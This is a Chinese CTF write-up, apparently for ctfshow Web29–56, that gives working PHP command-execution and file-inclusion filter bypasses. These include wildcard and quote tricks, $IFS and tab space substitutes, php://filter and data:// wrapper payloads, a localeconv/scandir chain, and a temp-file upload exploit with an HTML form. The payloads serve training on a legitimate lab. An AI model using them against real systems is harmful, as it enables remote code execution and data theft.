29-35
Web29
代码利用正则匹配过滤了flag,后面加了/i所以不区分大小写。
可以利用通配符绕过
匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file *
? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0
[abcd] 匹配abcd中任何一个字符
[a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls file 0
?c=system('cat f*');//glob1
?c=system('cat f?ag.php');//glob2
?c=system('cat f\lag.php');//转义字符实现绕过
?c=system("cat f''lag.php");
?c=eval($_GET[1]);&1=system('cat flag.php'); //马中马嵌套过滤
Web30
和上一题差不多就是多了system和php的过滤,system用passthru代替即可。
?c=passthru('cat fla?.p?p');
Web31
这题多了cat、空格、单引号、逗号的过滤。
cat代替命令
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
空格代替
<,<>,%20(space),%09(tab),$IFS$9, I F S , {IFS},IFS,IFS
?c=passthru("more%09fla*");
Web32
这题过滤多了 ; 和 ( 。分号我们可以用 ?> 代替,因为php中最后一句代码可以不用加 ;,但是 ( 被过滤了也就意味着不能用命令执行函数了,因为命令执行函数都要使用到括号。
这里我们可以使用文件包含函数,如include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile,PHP中文件包含函数可以不用使用括号。
payload如下,解释一下啥意思,使用include函数包含参数1,而参数1是通过get获取的flag.php。
php:///filter:是 PHP 中用于数据流处理的流封装协议之一,它允许你在读取或写入文件时,通过指定的过滤器对数据进行处理。
read=convert.base64-encode:这部分指定了过滤器类型为读取(read)操作,并且使用convert.base64-encode过滤器对数据进行 Base64 编码。Base64 编码是一种将二进制数据转换为 ASCII 字符串的方法,常用于在需要文本表示二进制数据的场合。
resource=:这部分后面应该跟上你想要读取并编码的文件路径
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
返回的数据是base64编码,拿去解码即可。
Web33
和上一题并无啥区别,多了双引号的过滤,但是我们上一题的poyload并无用到双引号,所以直接套用上一题的payload即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web34
观察了一下,只是多了冒号的过滤,上一题的payload我们没有用到冒号,所以继续套用即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web35
过滤多了左尖括号和等于号,无所谓,依旧套用payload即可。
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
36-40
Web36
这题过滤了0-9数字,我还想这个%0a改用什么代替呢,一查原来include函数不需要空格也行,那不就好办了吗,直接套用web35的payload即可,去掉%0a,把参数1改为字母就行。
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Web37
这题是通过C传参,接着使用include包含C,也就是把C的文件内容显示到页面上面,但是过滤了flag。我们可以用data伪协议,伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行,也就是说我们可以通过data伪协议造成rce。
data://协议用法:
data://text/plain,
data://text/plain;base64,
payload
?c=data://text/plain,<?php system("cat f*")?>
Web38
这题多了对php的过滤,直接套用上一题的payload坑定是不行了,查了一下原来在PHP中居然可以使用短标签 = 代替php,而且php不是必须的可以去掉,逆天了。
?c=data://text/plain,<?=system("cat f*")?>
Web39
这题没啥难度,就是拼接了个php,问题不大,直接套用上一题的payload即可。
?c=data://text/plain,<?=system("cat f*")?>
Web40
这题难度就上来了,可以看到几乎把所有的字符都过滤,只留下一个英文的括号。
这题要使用很多函数,我们先来了解一下。
print_r()函数不用多说,函数用于打印变量,作用对象是变量。
scandir()函数函数会扫描这个目录,并返回一个包含目录中所有文件和目录名的数组,也就是说scandir()会列出当前目录下的文件。
那么我们可以使用print_r(scandir('.'))来列出当前目录下的所有文件,并且打印在web页面。但是单引号和小数点都被过滤了,我们这里要找其他的函数来代替。
通过查找我们得知
localeconv():返回包含本地数字及货币信息格式的数组,其中数组中的第一个为点号(.)
那不妨这样子想,如果我们能找到一个函数截取localeconv()的值,使其只返回第一个值那我们不就得到小数点了吗?
pos() 和current() 函数返回数组中的当前元素(单元),默认取第一个值。
此时我们可以打印出当前目录下的文件名,无需单引号也行好像。
?c=print_r(scandir(pos(localeconv())));
OK,现在的问题是怎么读取文件里面的内容呢,通过查阅得知,
next():函数将内部指针指向数组中的下一个元素,并输出。
但是通过我们刚刚列出来的数组得知目前的顺序是 ".","..","flag.php","index.php",那我们直接把它们的顺序调换不就刚刚好吗,也就是"index.php","flag.php","..",".",那么此时next()函数指向的下一个刚好是flag.php。
通过查找
array_reverse():数组逆序,将文件目录反转。
此时我们便可以构造payload。
?c=print_r(next(array_reverse(scandir(current(localeconv())))));
但依旧不行,因为print_r函数打印的是变量,而我们要输出的是文件,于是我们这里就只能用show_source或者highlight_file。
?c=show_source(next(array_reverse(scandir(current(localeconv())))));
41-45
Web41
没复现出来
Web42
这题会对我们输入的参数拼接一个重定向,解释一下
> 代表重定向到哪里
/dev/null 代表空设备文件
2> 表示stderr标准错误
& 表示等同于的意思,2>&1,表示2的输出重定向等同于1
1 表示stdout标准输出,系统默认值是1,所以>/dev/null等同于 1>/dev/null
因此,>/dev/null 2>&1 也可以写成1> /dev/null 2> &1
1> /dev/null:首先表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,不显示任1何信息。
2> &1:接着,标准错误输出重定向到标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。
所以我们直接截断后面的语句即可。
?c=cat flag.php%0a
?c=cat flag.php||
?c=cat flag.php%26
?c=cat flag.php%26%26
?c=cat flag.php;
Web43
和上题目一摸一样的,只不过是多了cat的过滤,我们直接换成more即可。
Web44
多了flag的过滤,用我们上面说过的正则绕过即可。
?c=more%20fla*||
Web45
这题多了分号和空格的过滤。我们直接用%09代替空格即可
?c=more%09fla*||
46-50
Web46
过滤了数字和*,但是%09还能用。
?c=more%09fl?g.php||
Web47
这题对好几个查看flag的命令都做了过滤,但是没有过滤tac。
?c=tac%09fl?g.php||
Web48
依旧没有过滤tac,直接套用上一题的payload即可。
Web49
还是上一题的payload
Web50
这题多了对%过滤也就是说%09不能用了,那我们用<去代替空格即可,奇怪的是用?通配符不知道为啥不行。
c=tac<fl?g.php||
要用 ' ' 才行,对php来说这是fl""ag而不是flag关键字不会匹配上,但是对于linux系统来说cat /fl""ag等效于cat /flag。
c=tac<fl''ag.php||
51-55
Web51
这题多了tac的过滤,用nl命令代替即可。
c=nl<>fl""ag.php||
Web52
这题多了尖括号的过滤。
一开始直接查看flag,发现不对,说明真正的flag文件不在这个目录。
c=nl${IFS}fl""ag.php||
看一下根目录,发现根目录有个flag
c=ls${IFS}/||
直接查看根目录的flag即可。
?c=nl${IFS}/fl""ag||
Web53
没啥好讲的
c=nl${IFS}fl""ag.php
Web54
这题过滤了很多东西,flag不能用 * 或者 ' ' 来绕过了,nl也被过滤了,但是我们可以用uniq代替。
c=uniq${IFS}f???.php
Web55
过滤了字母,但是没有过滤数字,可以用base64编码,相当于调用/bin目录下的base64编码程序对flag.php进行编码输出
c=/???/????64%20????.???
等同于c=/bin/base64 flag.php
Web46
这题的难度也是直线上升好吧,可以看到数字和字母都过滤了,还有一些特殊符号也是过滤掉了。
但是没有过滤小数点,在linux中以 . /file 这样的方式来执行文件的话,file是不需要有x权限的,而且会用bash去执行file中的命令。那么我们如果上传一个可控文件,再往里面写入一个命令,那么不就是可以rce了吗。
这篇文章写的很好,可以看一下。
那么我们该如何去表示出我们的文件,因为过滤了字母。在PHP上传的临时文件包含大写字母。那么答案就呼之欲出了,我们只要找到一个可以表示"大写字母"的glob通配符,就能精准找到我们要执行的文件。
?c=.%20/???/????????[@-[]
先构造一个上传页面。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
抓包进行修改。
往文件中添加命令。
#!/bin/sh
ls
读取flag,如果发包没有回显flag,多发几次即可。
